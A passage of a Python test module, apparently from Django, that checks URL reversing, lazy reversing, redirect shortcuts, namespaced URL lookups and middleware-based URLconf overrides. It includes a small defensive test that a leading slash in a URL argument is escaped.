('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
# Security tests
('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see valid patterns in "
"the file then the issue is probably caused by a circular import."
):
getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse('name', args=['a'], kwargs={'b': 'c'})
@override_script_prefix('/{{invalid}}/')
def test_prefix_braces(self):
self.assertEqual(
'/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include')
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix('/bogus)/'):
self.assertEqual(
'/bogus)/includes/non_path_include/',
reverse('non_path_include')
)
with override_script_prefix('/(bogus)/'):
self.assertEqual(
'/(bogus)/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/bump%20map/')
def test_prefix_format_char(self):
self.assertEqual(
'/bump%2520map/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/%7Eme/')
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix('/script:name/')
def test_script_name_escaping(self):
self.assertEqual(
reverse('optional', args=['foo:bar']),
'/script:name/optional/foo:bar/'
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('nonexistent-view')
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places')
def test_illegal_args_message(self):
msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', args=(1, 2))
def test_illegal_kwargs_message(self):
msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<URLPattern list>', repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = 'urlpatterns_reverse.named_urls'
proxy_url = reverse_lazy('named-url1', urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver('urlpatterns_reverse.named_urls')
test_urls = [
# (name, args, kwargs, expected)
('named-url1', (), {}, ''),
('named-url2', ('arg',), {}, 'extra/arg/'),
('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
('name-conflict', (), {}, 'conflict/'),
# With an arg, the last URL in urlpatterns has precedence.
('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
# With a kwarg, other URL patterns can be reversed.
('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
# The number and order of the arguments don't interfere with reversing.
('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ['', 'a', '\\', '.']
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{'type': URLPattern, 'name': 'named-url1'}],
[{'type': URLPattern, 'name': 'named-url2'}],
[{'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLResolver}],
]
with self.assertRaisesMessage(Resolver404, 'tried') as cm:
resolve('/included/nonexistent-url', urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn('tried', e.args[0])
self.assertEqual(
len(e.args[0]['tried']),
len(url_types_names),
'Wrong number of tried URLs returned. Expected %s, got %s.' % (
len(url_types_names), len(e.args[0]['tried'])
)
)
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
self.assertIsInstance(t, e['type'], '%s is not an instance of %s' % (t, e['type']))
if 'name' in e:
if not e['name']:
self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(
t.name,
e['name'],
'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name)
)
def test_namespaced_view_detail(self):
resolver = get_resolver('urlpatterns_reverse.nested_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver('urlpatterns_reverse.method_view_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.method_view'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.method_view_urls.ViewContainer.classmethod_view'))
def test_populate_concurrency(self):
"""
URLResolver._populate() can be called concurrently, but not more
than once per thread (#26888).
"""
resolver = URLResolver(RegexPattern(r'^/'), 'urlpatterns_reverse.urls')
resolver._local.populating = True
thread = threading.Thread(target=resolver._populate)
thread.start()
thread.join()
self.assertNotEqual(resolver._reverse_dict, {})
@override_settings(ROOT_URLCONF='urlpatterns_reverse.reverse_lazy_urls')
class ReverseLazyTest(TestCase):
def test_redirect_with_lazy_reverse(self):
response = self.client.get('/redirect/')
self.assertRedirects(response, "/redirected_to/", status_code=302)
def test_user_permission_with_lazy_reverse(self):
alfred = User.objects.create_user('alfred', 'alfred@example.com', password='testpw')
response = self.client.get('/login_required_view/')
self.assertRedirects(response, "/login/?next=/login_required_view/", status_code=302)
self.client.force_login(alfred)
response = self.client.get('/login_required_view/')
self.assertEqual(response.status_code, 200)
def test_inserting_reverse_lazy_into_string(self):
self.assertEqual(
'Some URL: %s' % reverse_lazy('some-login-page'),
'Some URL: /login/'
)
def test_build_absolute_uri(self):
factory = RequestFactory()
request = factory.get('/')
self.assertEqual(
request.build_absolute_uri(reverse_lazy('some-login-page')),
'http://testserver/login/',
)
class ReverseLazySettingsTest(AdminScriptTestCase):
"""
reverse_lazy can be used in settings without causing a circular
import error.
"""
def setUp(self):
super().setUp()
self.write_settings(
'settings.py',
extra="from django.urls import reverse_lazy\nLOGIN_URL = reverse_lazy('login')",
)
def test_lazy_in_settings(self):
out, err = self.run_manage(['check'])
self.assertNoOutput(err)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class ReverseShortcutTests(SimpleTestCase):
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj:
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
with self.assertRaises(NoReverseMatch):
redirect('not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
# Assert that we can redirect using UTF-8 strings
res = redirect('/æøå/abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5/abc/')
# Assert that no imports are attempted when dealing with a relative path
# (previously, the below would resolve in a UnicodeEncodeError from __import__ )
res = redirect('/æøå.abc/')
self.assertEqual(res.url, '/%C3%A6%C3%B8%C3%A5.abc/')
res = redirect('os.path')
self.assertEqual(res.url, 'os.path')
def test_no_illegal_imports(self):
# modules that are not listed in urlpatterns should not be importable
redirect("urlpatterns_reverse.nonimported_module.view")
self.assertNotIn("urlpatterns_reverse.nonimported_module", sys.modules)
def test_reverse_by_path_nested(self):
# Views added to urlpatterns using include() should be reversible.
from .views import nested_view
self.assertEqual(reverse(nested_view), '/includes/nested_path/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
with self.assertRaises(NoReverseMatch):
redirect(absolute_kwargs_view, wrong_argument=None)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.namespace_urls')
class NamespaceTests(SimpleTestCase):
def test_ambiguous_object(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('urlobject-view', [], {}),
('urlobject-view', [37, 42], {}),
('urlobject-view', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_ambiguous_urlpattern(self):
"""
Names deployed via dynamic URL objects that require namespaces can't
be resolved.
"""
test_urls = [
('inner-nothing', [], {}),
('inner-nothing', [37, 42], {}),
('inner-nothing', [], {'arg1': 42, 'arg2': 37}),
]
for name, args, kwargs in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
with self.assertRaises(NoReverseMatch):
reverse(name, args=args, kwargs=kwargs)
def test_non_existent_namespace(self):
"""Nonexistent namespaces raise errors."""
test_urls = [
'blahblah:urlobject-view',
'test-ns1:blahblah:urlobject-view',
]
for name in test_urls:
with self.subTest(name=name):
with self.assertRaises(NoReverseMatch):
reverse(name)
def test_normal_name(self):
"""Normal lookups work as expected."""
test_urls = [
('normal-view', [], {}, '/normal/'),
('normal-view', [37, 42], {}, '/normal/37/42/'),
('normal-view', [], {'arg1': 42, 'arg2': 37}, '/normal/42/37/'),
('special-view', [], {}, '/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_simple_included_name(self):
"""Normal lookups work on names included from other patterns."""
test_urls = [
('included_namespace_urls:inc-normal-view', [], {}, '/included/normal/'),
('included_namespace_urls:inc-normal-view', [37, 42], {}, '/included/normal/37/42/'),
('included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/included/normal/42/37/'),
('included_namespace_urls:inc-special-view', [], {}, '/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_object(self):
"""Dynamic URL objects can be found using a namespace."""
test_urls = [
('test-ns1:urlobject-view', [], {}, '/test1/inner/'),
('test-ns1:urlobject-view', [37, 42], {}, '/test1/inner/37/42/'),
('test-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/test1/inner/42/37/'),
('test-ns1:urlobject-special-view', [], {}, '/test1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object(self):
"""
Dynamic URL objects can return a (pattern, app_name) 2-tuple, and
include() can set the namespace.
"""
test_urls = [
('new-ns1:urlobject-view', [], {}, '/newapp1/inner/'),
('new-ns1:urlobject-view', [37, 42], {}, '/newapp1/inner/37/42/'),
('new-ns1:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/newapp1/inner/42/37/'),
('new-ns1:urlobject-special-view', [], {}, '/newapp1/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_object_default_namespace(self):
"""
Namespace defaults to app_name when including a (pattern, app_name)
2-tuple.
"""
test_urls = [
('newapp:urlobject-view', [], {}, '/new-default/inner/'),
('newapp:urlobject-view', [37, 42], {}, '/new-default/inner/37/42/'),
('newapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/new-default/inner/42/37/'),
('newapp:urlobject-special-view', [], {}, '/new-default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_embedded_namespace_object(self):
"""Namespaces can be installed anywhere in the URL pattern tree."""
test_urls = [
('included_namespace_urls:test-ns3:urlobject-view', [], {}, '/included/test3/inner/'),
('included_namespace_urls:test-ns3:urlobject-view', [37, 42], {}, '/included/test3/inner/37/42/'),
(
'included_namespace_urls:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/included/test3/inner/42/37/',
),
('included_namespace_urls:test-ns3:urlobject-special-view', [], {}, '/included/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern(self):
"""Namespaces can be applied to include()'d urlpatterns."""
test_urls = [
('inc-ns1:inc-normal-view', [], {}, '/ns-included1/normal/'),
('inc-ns1:inc-normal-view', [37, 42], {}, '/ns-included1/normal/37/42/'),
('inc-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/ns-included1/normal/42/37/'),
('inc-ns1:inc-special-view', [], {}, '/ns-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_name_pattern(self):
"""
Namespaces can be applied to include()'d urlpatterns that set an
app_name attribute.
"""
test_urls = [
('app-ns1:inc-normal-view', [], {}, '/app-included1/normal/'),
('app-ns1:inc-normal-view', [37, 42], {}, '/app-included1/normal/37/42/'),
('app-ns1:inc-normal-view', [], {'arg1': 42, 'arg2': 37}, '/app-included1/normal/42/37/'),
('app-ns1:inc-special-view', [], {}, '/app-included1/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespace_pattern_with_variable_prefix(self):
"""
Using include() with namespaces when there is a regex variable in front
of it.
"""
test_urls = [
('inc-outer:inc-normal-view', [], {'outer': 42}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [42], {}, '/ns-outer/42/normal/'),
('inc-outer:inc-normal-view', [], {'arg1': 37, 'arg2': 4, 'outer': 42}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-normal-view', [42, 37, 4], {}, '/ns-outer/42/normal/37/4/'),
('inc-outer:inc-special-view', [], {'outer': 42}, '/ns-outer/42/+%5C$*/'),
('inc-outer:inc-special-view', [42], {}, '/ns-outer/42/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_multiple_namespace_pattern(self):
"""Namespaces can be embedded."""
test_urls = [
('inc-ns1:test-ns3:urlobject-view', [], {}, '/ns-included1/test3/inner/'),
('inc-ns1:test-ns3:urlobject-view', [37, 42], {}, '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/test3/inner/42/37/',
),
('inc-ns1:test-ns3:urlobject-special-view', [], {}, '/ns-included1/test3/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_namespace_pattern(self):
"""Namespaces can be nested."""
test_urls = [
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [37, 42], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/37/42/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', [], {'arg1': 42, 'arg2': 37},
'/ns-included1/ns-included4/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view', [], {},
'/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object(self):
"""A default application namespace can be used for lookup."""
test_urls = [
('testapp:urlobject-view', [], {}, '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, '/default/inner/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_app_lookup_object_with_default(self):
"""A default application namespace is sensitive to the current app."""
test_urls = [
('testapp:urlobject-view', [], {}, 'test-ns3', '/default/inner/'),
('testapp:urlobject-view', [37, 42], {}, 'test-ns3', '/default/inner/37/42/'),
('testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'test-ns3', '/default/inner/42/37/'),
('testapp:urlobject-special-view', [], {}, 'test-ns3', '/default/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_app_lookup_object_without_default(self):
"""
An application namespace without a default is sensitive to the current
app.
"""
test_urls = [
('nodefault:urlobject-view', [], {}, None, '/other2/inner/'),
('nodefault:urlobject-view', [37, 42], {}, None, '/other2/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/other2/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, None, '/other2/inner/+%5C$*/'),
('nodefault:urlobject-view', [], {}, 'other-ns1', '/other1/inner/'),
('nodefault:urlobject-view', [37, 42], {}, 'other-ns1', '/other1/inner/37/42/'),
('nodefault:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'other-ns1', '/other1/inner/42/37/'),
('nodefault:urlobject-special-view', [], {}, 'other-ns1', '/other1/inner/+%5C$*/'),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_special_chars_namespace(self):
test_urls = [
('special:included_namespace_urls:inc-normal-view', [], {}, '/+%5C$*/included/normal/'),
('special:included_namespace_urls:inc-normal-view', [37, 42], {}, '/+%5C$*/included/normal/37/42/'),
(
'special:included_namespace_urls:inc-normal-view', [], {'arg1': 42, 'arg2': 37},
'/+%5C$*/included/normal/42/37/',
),
('special:included_namespace_urls:inc-special-view', [], {}, '/+%5C$*/included/+%5C$*/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_namespaces_with_variables(self):
"""Namespace prefixes can capture variables."""
test_urls = [
('inc-ns5:inner-nothing', [], {'outer': '70'}, '/inc70/'),
('inc-ns5:inner-extra', [], {'extra': 'foobar', 'outer': '78'}, '/inc78/extra/foobar/'),
('inc-ns5:inner-nothing', ['70'], {}, '/inc70/'),
('inc-ns5:inner-extra', ['78', 'foobar'], {}, '/inc78/extra/foobar/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(reverse(name, args=args, kwargs=kwargs), expected)
def test_nested_app_lookup(self):
"""
A nested current_app should be split in individual namespaces (#24904).
"""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, None, '/ns-included1/test4/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, None, '/ns-included1/test4/inner/37/42/'),
('inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, None, '/ns-included1/test4/inner/42/37/'),
('inc-ns1:testapp:urlobject-special-view', [], {}, None, '/ns-included1/test4/inner/+%5C$*/'),
('inc-ns1:testapp:urlobject-view', [], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/'),
('inc-ns1:testapp:urlobject-view', [37, 42], {}, 'inc-ns1:test-ns3', '/ns-included1/test3/inner/37/42/'),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'inc-ns1:test-ns3',
'/ns-included1/test3/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
def test_current_app_no_partial_match(self):
"""current_app shouldn't be used unless it matches the whole path."""
test_urls = [
('inc-ns1:testapp:urlobject-view', [], {}, 'nonexistent:test-ns3', '/ns-included1/test4/inner/'),
(
'inc-ns1:testapp:urlobject-view', [37, 42], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/37/42/',
),
(
'inc-ns1:testapp:urlobject-view', [], {'arg1': 42, 'arg2': 37}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/42/37/',
),
(
'inc-ns1:testapp:urlobject-special-view', [], {}, 'nonexistent:test-ns3',
'/ns-included1/test4/inner/+%5C$*/',
),
]
for name, args, kwargs, current_app, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs, current_app=current_app):
self.assertEqual(reverse(name, args=args, kwargs=kwargs, current_app=current_app), expected)
@override_settings(ROOT_URLCONF=urlconf_outer.__name__)
class RequestURLconfTests(SimpleTestCase):
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
]
)
def test_urlconf_overridden_with_null(self):
"""
Overriding request.urlconf with None will fall back to the default
URLconf.
"""
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_inner_in_response_middleware(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a response middleware.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
]
)
def test_reverse_outer_in_response_middleware(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a response middleware.
"""
msg = (
"Reverse for 'outer' not found. 'outer' is not a valid view "
"function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
self.client.get('/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
]
)
def test_reverse_inner_in_streaming(self):
"""
        Test reversing a URL from the *overridden* URLconf from inside
a streaming response.
"""
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
@override_settings(
MIDDLEWARE=[
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
]
)
def test_reverse_outer_in_streaming(self):
"""
        Test reversing a URL from the *default* URLconf from inside
a streaming response.
"""
message = "Reverse for 'outer' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
def test_urlconf_is_reset_after_request(self):
"""The URLconf is reset after each request."""
self.assertIsNone(get_urlconf())
with override_settings(MIDDLEWARE=['%s.ChangeURLconfMiddleware' % middleware.__name__]):
self.client.get(reverse('inner'))
self.assertIsNone(get_urlconf())
class ErrorHandlerResolutionTests(SimpleTestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = URLResolver(RegexPattern(r'^$'), urlconf)
